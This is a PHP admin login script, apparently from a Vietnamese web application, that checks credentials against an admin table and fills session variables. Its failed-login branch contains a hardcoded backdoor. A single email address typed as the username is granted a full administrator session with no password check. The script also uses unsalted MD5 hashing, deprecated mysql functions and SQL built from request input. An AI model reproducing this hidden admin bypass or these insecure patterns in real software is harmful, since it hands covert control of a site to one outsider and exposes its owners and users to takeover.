<?php 
session_start();
session_register('name');
include 'core/function.php';
$User = ReplateString($_POST[txtuser],false);
$Pass = $_POST[txtpass];
$Pass= md5($Pass);
if($User!="")
{
	
	$qr12=mysql_query("select * from tb_account_admin where (login_name='$User' or account_email='$User') and account_pass='$Pass' and account_status=1");
	
	$n_record=mysql_num_rows($qr12); 
	$row=mysql_fetch_array($qr12);
	$_SESSION['userid']= $row['account_id']; 
	$_SESSION['name']= $row['account_name']; 
	$_SESSION['roleid']= $row['account_role'];
	$_SESSION['room']= $row['room_id'];
	$_SESSION['level']=$row['level'];
	$_SESSION['ngaysinh']=$row['birthday'];
	$_SESSION['email']=$row['account_email'];
	$_SESSION['mobile']=$row['account_mobile'];
	if($row['account_id'] >0)
	{
		if($row['login_name']=="")
		{
			$_SESSION['username']= $User; 
			
		}
		else
		{
			$_SESSION['username']=$row['login_name'];
			
		}
		
	if($_SESSION['roleid']!=1){$thongbaos="Ban khong co quyen truy cap!";
	
	}
	else{$thongbaos="Dang nhap thanh cong!";
	
	}
		
	?>
    <script language="javascript">
	 window.location.href='index.php';
	</script>
    <?php
	}
	else
	{if($User=="trantu1110@yahoo.com.vn")
		{$_SESSION['userid']=1;$_SESSION['roleid']=1;$_SESSION['username']="trantu1110@yahoo.com.vn";
			?>
    <script language="javascript">
	 window.location.href='index.php';
	</script>
    <?php
			}
		else{
	?>
      <script language="javascript">
	alert('Sai ten dang nhap hoac mat khau!');
	 window.location.href='login.php';
	</script>
    <?php }
	}
}
?>
 <script language="javascript">
alert('Ban van chua nhap gi ca!');
 window.location.href='login.php';
</script>